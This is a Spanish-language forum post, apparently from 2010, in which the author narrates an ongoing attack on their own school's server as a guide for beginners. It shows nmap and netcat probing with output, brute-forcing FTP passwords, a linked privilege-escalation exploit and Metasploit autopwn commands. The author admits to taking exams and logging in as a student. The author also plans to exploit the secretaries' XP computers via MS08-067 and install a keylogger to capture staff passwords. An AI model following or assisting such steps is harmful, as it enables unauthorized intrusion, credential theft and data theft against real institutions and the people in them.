Bueno perdonadme por el doble post pero aqui dejo mis cronicas para iniciar este tema el ataque sigue en curso y de momento va bien.
Servidor: servidor.instituto.es
URL del aviso: He avisado persdonalmente al administrador.
Servicios vulnerables: SMTP | PureFTPd
Crónica: Escogi el servidor ya que era el de mi instituto y si remotamente no se podia hacer nada pues siempre me quedaba un ataque local.
------------------------------------------------------------------------------------------------------------------
1- Escaneando con NMAP
------------------------------------------------------------------------------------------------------------------Como todos mis ataque empeze con un escaneo mediante el nmap:
nmap -sS -sV servidor.instituto.es
Starting Nmap 5.00 ( http://nmap.org ) at 2010-06-02 21:45 CEST
Interesting ports on servidor.instituto.es:
Not shown: 975 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp PureFTPd
25/tcp open smtp?
53/tcp open domain
80/tcp open http Apache httpd 2.0.63
110/tcp open pop3 Courier pop3d
443/tcp open http Apache httpd 2.0.63
465/tcp open ssl/smtp Exim smtpd 4.69
1720/tcp open H.323/Q.931?
1723/tcp closed pptp
1863/tcp open msnp?
6000/tcp closed X11
6001/tcp closed X11:1
6002/tcp closed X11:2
6003/tcp closed X11:3
6004/tcp closed X11:4
6005/tcp closed X11:5
6006/tcp closed X11:6
6007/tcp closed X11:7
6009/tcp closed X11:9
6025/tcp closed unknown
6059/tcp closed X11:59
10000/tcp closed snet-sensor-mgmt
20000/tcp closed unknown
20005/tcp closed btx
20031/tcp closed unknown
------------------------------------------------------------------------------------------------------------------
2- NC comprobando servicios abiertos
------------------------------------------------------------------------------------------------------------------Tras descubrir que servicios se estaban corriendo en el servidor comprobe uno por uno los puertos intentandome conectar a ellos para ver si estaban abiertos:
-Puerto 21
nc servidor.instituto.es 21
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 8 of 50 allowed.
220-Local time is now 20:49. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
user guest
331 User guest OK. Password required
guest
530 You aren't logged in
help
214-The following SITE commands are recognized
ALIAS
CHMOD
IDLE
UTIME
214 Pure-FTPd - http://pureftpd.org/
Bueno ejecutando los comandos permitidos para todos me pide usuario y contraseña asi que no se permiten acciones anonimas.
-Puerto 25
nc servidor.instituto.es 25
220-******************************************************************
220-******************************************************************
220 *******************
help
214-Commands supported:
214 AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP
RSET
250 Reset OK
Tienen es servidor de correo abierto o.O' que cosas tiene la vida.
-Puerto 110
nc servidor.instituto.es 110
+OK Hello there.
user guest@hotmail.com
+OK Password required.
pass guest
-ERR Login failed.
Nada, tambien se necesita contraseña.
Los demas puertos son connection refused vamos que no me deja conectarme.
------------------------------------------------------------------------------------------------------------------
3- Explotando servicios
-------------------------------------------------------------------------------------------------------------------SMTP-
Habiendo visto que esta abierto el servicio de correo SMTP simplemente tenemos que configurar cualquier gestor de correo tipo
Correo Evolution.
Asi podras crearte tu correo que sera del tipo:
tunombre@servidor.instituto.es-FTP-
Buscando por la web se pueden encontrar exploits que te permiten pasar de un usuario nomal y corriente a un superusuario, pero primero es encontrar un usuario y una contraseña, para lo que yo he usado
BRUTUS. Tras encontrar un usuario y una contraseña (cosa que yo todavia estoy en proceso 150.000 pass probadas) pues corremos cualquiera de los exploits como por ejemplo:
http://pastebin.com/1BfhBPb5Con lo que sacaremos superusuario y entonces ya podremos bajar,subir y ejecutar archivos.
Y ya estaremos dentro.
------------------------------------------------------------------------------------------------------------------
4- Proyecto
------------------------------------------------------------------------------------------------------------------
Uno de estos dias que estamos a final de curso la idea seria llevfarme la PC al instituto y como todos los ordenadores de secretaria usan XP explotar los ordenadores mediante la vulnerabilidad MS08-067:
http://www.milw0rm.com/exploits/6841Despues instalar un sniffer o un keyloger, reiniciar las PC's pra que tengan que volver a meter todas las contraseñas y a ver si capturo alguna interesante.
------------------------------------------------------------------------------------------------------------------
5- Ultimas lineas
------------------------------------------------------------------------------------------------------------------
Solo decir que con un poco de imaginacion se pueden hacer grandes cosas, que esto es un ataque basico y que ire actualizando el post con forme valla superando las metas que me he puesto, espero que os haya servido a los que os quereis iniciar.
Aqui os dejo otros metodos que he seguido aunque no hallan dado resultados o me han dado los que ya tenia.
--Scanner
nessus &
Metasploit framework Haces el escaner con el nessus y despues lo guardas como un archivo.nessus
Abres el metasploit:
db_connect
db_import_nessus_xml ruta\ruta\nombrearchivo.nessus
db_autopwn -t
Asi veras todos los exploits que se pueden utilizar contra ese servidor
y despues o usas:
db_autopwn -x -e
Y si no pues lo haces tu manualmente.
Tutorial sacado de
aqui.
--
Intellitamper & busqueda de .ini u otros.
Otra de las cosas que hice fue listar todos los archivos del servidor con el programa nombrado anteriormente en busca de archivos .ini u otros que contenisesen contraseñas que luego las podria usar para registrarme como un usuario y cambiar contenidos de la WEB.
Esto tambien me permitio descargar examenes y apuntes. A demas una de las contraseñas era de las que introduces JDHDJA y te lleva a JDHDJA.html asi que solo tuve que buscar un archivo con nombre extraño y registrarme como un alumno mas.
Solo espero que os sirva de orientacion y que valga para algo.
Saludos Søra.
Autor
En línea
